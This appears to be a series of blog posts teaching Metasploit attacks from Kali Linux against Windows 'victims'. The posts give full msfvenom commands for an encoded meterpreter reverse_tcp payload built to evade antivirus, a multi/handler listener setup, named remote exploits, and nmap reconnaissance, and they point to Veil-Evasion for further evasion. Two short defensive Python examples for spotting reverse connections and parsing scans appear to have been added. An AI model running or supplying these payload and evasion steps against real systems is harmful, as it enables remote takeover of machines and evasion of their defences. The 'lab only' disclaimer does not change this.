Client Side Attacks

If you are viewing this post, you should at least have your own Kali Linux machine with you.
Assuming you have your machine with you, I have not uploaded any reference images.

As already mentioned:

Attacker's IP : 10.4.33.3 [Kali Linux OS]

Victim's IP   : 10.4.33.8 [any Windows OS; use XP or 7 for fewer complications]

The payload we use is windows/meterpreter/reverse_tcp

We have already seen how to generate a payload, but for now we are using msfvenom to create the payload, as it was a new addition in the Kali Linux 2 (Sana) release.

Type this command in a root terminal: msfvenom -h

Looking at the help table it prints, we can build a payload from these options:

-p : specifies our payload

-a : architecture

--platform : the victim's OS

-e : encoder, used to try to evade weak or free antivirus products, including Windows Defender

-f : format of the output file; it may be .bat or .exe for Windows, .elf for Linux, etc.

-o : saves the output file at the given location

Now, getting our payload.
I already mentioned that there are several variables in a payload that need to be defined before generating it.
You can see those variables in Metasploit with the command show options.

Finding Variables

  • Terminal 1

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options 

Now you can see the list of variables needed, i.e. LHOST and LPORT.

Keep this terminal open; we will come back to it.

Open a new terminal and use this command to create the payload:

  • Terminal 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=10.4.33.3 LPORT=3456 -e x86/shikata_ga_nai -f exe -o /root/Desktop/payload.exe

Here LHOST = our IP; we can find it with the terminal command ifconfig.

LPORT = any port, but remember which port you used.

After running this command successfully you will see a payload.exe file on your desktop.

Now you can close this second terminal.

Come back to Terminal 1:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options      [up to here was already done]

set LHOST 10.4.33.3    [our IP, not the victim's IP]

set LPORT 3456   [this is why we needed to remember the port used before]

set ExitOnSession false   [advanced option, not required, but useful if the attack is running against several machines]

exploit, or exploit -j

Remember, if you use -j (run as a background job) the meterpreter session will not be displayed directly; each incoming connection is assigned a session number in order:
the first victim to session 1, the next to session 2, and so on.

So in the same terminal you need the extra command sessions -i 1 to interact with session 1, i.e. to operate the first victim.

For this to happen, the payload.exe file must be run on the victim's PC. Sending that file to the victim's PC is a separate task; for now, to get some information, just copy it to the victim's PC and run the file.

Terminal 1 should not be closed, as after all these commands, in order, it is now the terminal for the victim.

It should look like this (screenshot):

In this screenshot, 192.168.222.135 is the attacker and 192.168.222.137 is the victim.

Now you can see the meterpreter prompt. If you can see it, the PC with the IP above is now under your control.
It has been hacked, and you can do whatever you want.
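Seen from the defender's side, the step above is the victim opening a connection out to LHOST:LPORT, which is exactly what egress connection logs record. The following is an added example, not part of the original post, that flags long-lived outbound connections to ports outside an allowlist; the log format, the allowlist and the 60-second threshold are assumptions made for this example.

```python
# Added example (not from the original post). A reverse_tcp payload makes
# the victim connect *out* to LHOST:LPORT, so the evidence is in egress
# connection logs. The log format is constructed for this example:
# "timestamp src_ip src_port dst_ip dst_port duration_seconds" per line.
from collections import namedtuple

Conn = namedtuple("Conn", "ts src sport dst dport duration")

ALLOWED_PORTS = {53, 80, 443}   # what workstations here legitimately use outbound (assumption)
LONG_LIVED_SECONDS = 60         # a shell session stays open; a web hit does not

def parse_conn_log(text):
    conns = []
    for line in text.strip().splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, sport, dst, dport, dur = line.split()
        conns.append(Conn(ts, src, int(sport), dst, int(dport), float(dur)))
    return conns

def flag_reverse_connections(conns, allowed_ports=ALLOWED_PORTS, min_duration=LONG_LIVED_SECONDS):
    """Return (src, dst, dport, duration) for each long-lived connection to a
    destination port outside the allowlist. The source port is ignored: what
    matters is where the workstation connected *to* and for how long."""
    return [(c.src, c.dst, c.dport, c.duration) for c in conns
            if c.dport not in allowed_ports and c.duration >= min_duration]

# Constructed sample: the victim from the post (10.4.33.8) holding a session
# open to the handler at 10.4.33.3:3456, beside ordinary DNS, HTTPS and a
# short SMB exchange that the duration threshold lets through.
SAMPLE_LOG = """
# ts src sport dst dport duration
2024-01-01T10:00:01 10.4.33.8 49201 10.4.33.2 53 0.2
2024-01-01T10:00:02 10.4.33.8 49202 203.0.113.10 443 12.5
2024-01-01T10:00:05 10.4.33.8 49203 10.4.33.3 3456 1842.0
2024-01-01T10:01:00 10.4.33.9 49300 10.4.33.10 445 0.5
"""

if __name__ == "__main__":
    for hit in flag_reverse_connections(parse_conn_log(SAMPLE_LOG)):
        print("suspicious outbound session:", hit)
```

A real allowlist is per network, and a handler listening on 443 would pass this check, so pair it with the session-length and destination-reputation checks your environment supports.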

But the disadvantages of this approach:

  1. We need to deliver the payload [payload.exe] to the victim.
  2. A good antivirus can detect it.
  • Evading Antivirus Detection

You can evade almost any antivirus by creating your payload with Veil-Evasion.

There will be a separate blog post for that.

  • Delivering the Payload

There are some awesome techniques for this, but for now just send the file yourself.

I can mention some exploits that don't need the payload to be delivered:

  1. exploit/windows/dcerpc/ms03_026_dcom [DCERPC vulnerability]
  2. exploit/windows/smb/ms08_067_netapi   [SMB vulnerability]

But these are vulnerability-specific, and both have a common variable RHOST, which you need to set to 10.4.33.8, i.e. set RHOST 10.4.33.8 [victim's IP].

There are also exploits that can be attached to PDF and Excel files, e.g.:

exploit/windows/fileformat/adobe_utilprintf

It varies according to the situation, but my aim is not to leave you with any confusion or misconceptions.

Doubts and suggestions can be commented below.


Vulnerability Scanning

Vulnerability scanning is the step where we find a payload suitable for attacking a machine.

What we do now is the most important phase in hacking. It may look easy here, but this is the difficult path; this is where a real hacker writes his own code.

When should a hacker write his own code, and when should he use tools?

How can we find a suitable payload?

There is no need to write code every time. First check which vulnerabilities the target has; if it is highly secure, fully updated, "the God PC", or you need to do something unusual that was never done before, like the Ransomware or WannaCry virus, then you should write your own code.

So, our first task is to find whether any vulnerabilities are present. There are many ways to do that, but one of my favourites is the tool Nmap.

Nmap is one of the best scanners: it gives information about a system from the ports it is using, and it can even tell us which OS the victim's machine runs.

From now on:

Attacker's IP : 10.4.33.3

Victim's IP   : 10.4.33.8

Remember, the victim's IP can be 10.9.1.19, 172.16.101.104 or 172.16.48.38, from a different gateway but the same private network.

Now we need to find information about the PC that was assigned the IP 10.4.33.8.

The following terminal commands give you a lot of information.

nmap -sS 10.4.33.8 lists the ports that are open.

Ignore the IP in the picture above [replace it with your victim's IP].

Now you can see a lot of open ports and the services behind them, like:

22 port – SSH

23 port – telnet

Now the command nmap -sV 10.4.33.8 gives you the versions of the services our victim is using.
Recently an exploit was released for OpenSSH 5.3, so you can load that module into Metasploit, fill the required variables like RHOST, LHOST, RPORT, LPORT and VERBOSE, and use it as a remote exploit. But you may find the target is running the latest updated version, for many reasons.

Now what to do ?

OS scan: you can identify the OS with the command nmap -O -Pn 10.4.33.8

-O : detect which OS

-Pn : treat the host as alive; don't skip it because a normal ping test failed.


This is how we get information about our victim's machine. There are many ways to find information; it varies according to the location and position of the victim's machine.

If you have a different scenario and are not able to find a way, just give me some information and I will guide you. This is for educational purposes only; it should be done in your lab environment only.

In the next post we will use a common way of hacking any Windows machine, both with antivirus enabled and with antivirus disabled.
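The same scan output can be read by a script instead of by eye. The following is an added example, not from the original post, that parses nmap's -oX XML output (the scan above, run with -sV -O and -oX scan.xml added) into a list of open services and versions to review on each lab machine; SAMPLE_XML is a constructed sample in nmap's output layout, not a real scan.

```python
# Added example (not from the original post): parse the XML that
# "nmap -sS -sV -O -oX scan.xml 10.4.33.8" writes, so the scan becomes a
# checklist of what each lab machine exposes. SAMPLE_XML is a constructed
# sample in nmap's real -oX layout, not a real scan.
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX scan.xml 10.4.33.8">
  <host>
    <status state="up"/>
    <address addr="10.4.33.8" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="5.3" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="23"><state state="open"/>
        <service name="telnet" method="table" conf="3"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/>
        <service name="microsoft-ds" method="table" conf="3"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 7" accuracy="96"/></os>
  </host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Return {ip: {"os": ..., "ports": [(port, proto, state, name, product, version)]}}."""
    report = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = []
        for p in host.iter("port"):
            svc = p.find("service")
            get = svc.get if svc is not None else (lambda k: None)
            ports.append((int(p.get("portid")), p.get("protocol"), p.find("state").get("state"),
                          get("name"), get("product"), get("version")))
        osmatch = host.find("os/osmatch")  # first <osmatch> is nmap's best guess
        report[addr.get("addr")] = {"os": osmatch.get("name") if osmatch is not None else None,
                                    "ports": ports}
    return report

def open_services(report):
    """Open ports only, labelled 'product version' when -sV identified it, else service name."""
    out = []
    for ip, host in report.items():
        for port, _proto, state, name, product, version in host["ports"]:
            if state == "open":
                out.append((ip, port, " ".join(x for x in (product, version) if x) or name))
    return out
```

A "filtered" port never reaches the list, and a service identified only by table lookup (conf 3) carries no version, which is the signal to verify it on the host itself.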

Doubts and suggestions can be commented below.

 

Metasploit Fundamentals

  • Basic commands of Metasploit
  • Payload types
  • Generating payloads in Metasploit

Basic Commands of Metasploit

In this article we will talk about the very basics of Metasploit and the Metasploit commands used in its command-line interface.

Before learning the Metasploit commands, first make sure your system is up to date. These are the necessary commands to update your OS:

apt-get update

apt-get upgrade

apt-get dist-upgrade

Don't ever try to update Metasploit with the command msfupdate without knowing what you are doing.

You can open Metasploit with the terminal command msfconsole, which opens with a Metasploit banner as below.

Now we are in msfconsole, which can be nicknamed the Metasploit terminal or console;
every command related to Metasploit should be executed here.
Below is a list of some commands and what they do.

*Every command will be in bold italics [ command ] in this blog.

help

You can further refine your searches by using the built-in keyword system.

set

The ‘set’ command allows you to configure Framework options and parameters for the current module you are working with.

auxiliary

Executing ‘show auxiliary’ will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

exploits

Naturally, ‘show exploits’ will be the command you are most interested in running since, at its core, Metasploit is all about exploitation. Run ‘show exploits’ to get a listing of all exploits contained in the framework.

payloads

Running ‘show payloads’ will display all of the different payloads for all platforms available within Metasploit.

use

The ‘use’ command changes your context to a specific module, exposing type-specific commands.

exit

This command takes you back to your root terminal, or the default terminal.

These are some basic commands.

Now, how to use an exploit in Metasploit, assuming we know which exploit we want to use. Later we will discuss the most useful and commonly used exploits.

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

This is the exploit; use the command ‘use’ to select it, and you will see the msfconsole prompt change to show that a particular exploit was selected.

Follow with these commands to see what needs to be configured, and set the values with the set command:

show targets : tells you what type of machine can be attacked

show payloads : shows the list of payloads valid for the chosen exploit

Now set the required payload with the set command, choosing from the list shown by show payloads.

ex: set payload windows/meterpreter/reverse_tcp          where “windows/meterpreter/reverse_tcp” is one of the payloads listed by show payloads.

show options : after setting the payload, this command lists the necessary details required to fill the variables present in our selected payload.

ex : if “x” is a variable that must be filled in before our payload executes, show options will show you information about “x”; using this you will never get stuck on an error before executing the code.

show advanced : similar to show options but for advanced settings; leaving these unset will not lead to any error.

show evasion : similar to show options.

  • Payload types

There are many types of payload:

  1. Inline (Non-Staged)
  2. Staged
  3. Meterpreter
  4. PassiveX
  5. NoNX
  6. Ord
  7. IPv6
  8. Reflective DLL Injection

It is not necessary to explain all these types now, but if someone is interested you can contact me.

For now we will just concentrate on the Meterpreter type payloads.

Meterpreter : short for Meta-Interpreter, is an advanced, multi-faceted payload that operates via DLL injection. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required.

  • Generating Payloads in Metasploit

Payloads can be generated in Metasploit with the following commands from your root terminal:

  1. msfconsole : takes us to the Metasploit terminal from the root terminal
  2. search payload : lists a lot of payloads; select a useful one for your attack. You can learn about payloads later; for now we are using an arbitrary payload.
  3. use payload/windows/shell_bind_tcp : after choosing a payload, select it with the command ‘use’
  4. generate : generates the raw code, which can also be produced in many other forms using the options below.
  5. generate -h : lists the additional options that generate accepts, similar to “-h”

You can also generate payloads in other ways; you can use the Social-Engineer Toolkit, whose command is setoolkit in the root terminal, but the way we generate is a bit different.

There are many other external tools too,

like Veil-Evasion, which is one of the best ways to create a payload that antivirus does not detect; we will look at these in detail later.

I guess for now you are able to create your own payload given its name. Remember that some payloads need their variables filled in, so never forget to use the command show options after selecting the payload. In the payload we generated above there were no predefined variables, so I never checked it.

After a lot of practice and usage you will be capable of selecting a payload just from the situation, and you will be aware of the variables too.

My contact details.
gmail: kaparapu.akhilnaidu@gmil.com

facebook: https://www.facebook.com/kaparapu.akhilnaidu

For any doubts and suggestions comment below.

Introduction

  • Requirements
  • Metasploit Modules

Requirements

Before we learn to use Metasploit we should prepare our Metasploit lab environment. Preparing a lab environment will help us locate our problems or mistakes easily, as it is well ordered and you know what is going on.

A lab environment doesn't mean you need different PCs or laptops; you can create a lab environment with your only laptop or PC, ensuring that it meets or exceeds the following system requirements.

We are using a virtual machine; you can find a lot of videos online on how to get the free VMware and install both Kali Linux and a Windows operating system on a single PC.
If there is a problem with installing, you can comment below.

A minimum of 30 GB of space for your Kali Linux operating system. The bare minimum requirement for VMware Player is a 400 MHz or faster processor (500 MHz recommended); the more horsepower you can throw at it, of course, the better. Finally, a decent Internet connection.

Metasploit Modules

The Metasploit Framework is composed of many modules, like Exploits, Payloads, Encoders and Nops.

  • Exploits 

Defined as the modules that use payloads

An exploit without a payload is an Auxiliary module

  • Payloads,Encoders,Nops

Payloads consist of code that runs remotely

Encoders ensure that payloads make it to their destination

Nops keep the payload sizes consistent

Loading Additional Module Trees
Metasploit gives you the freedom to load modules either at runtime or after msfconsole has already been started. Pass the -m option when running msfconsole to load at runtime.

See you again with Metasploit Fundamentals, doubts and suggestions can be commented below.

 

Network and Security

This blog is to guide you in the right direction for your future career in network and security.
I got many personal emails asking me to write a blog after my YouTube channel was blocked. At that time it was a bit more work for me to write a blog without any preparation, so I started exploring cyber security more and more; I attended a lot of workshops conducted all over India, and I myself conducted a series of workshops at IIT Guwahati.

For now I can start my own series of lectures through this blog.
In this lecture series we will be using Kali Linux as our operating system [attacker machine] and a Windows operating system [victim].

Our first lecture is on Metasploit.

This post will be updated regularly with direct links below, within the index itself.

Doubts and suggestions can be commented below.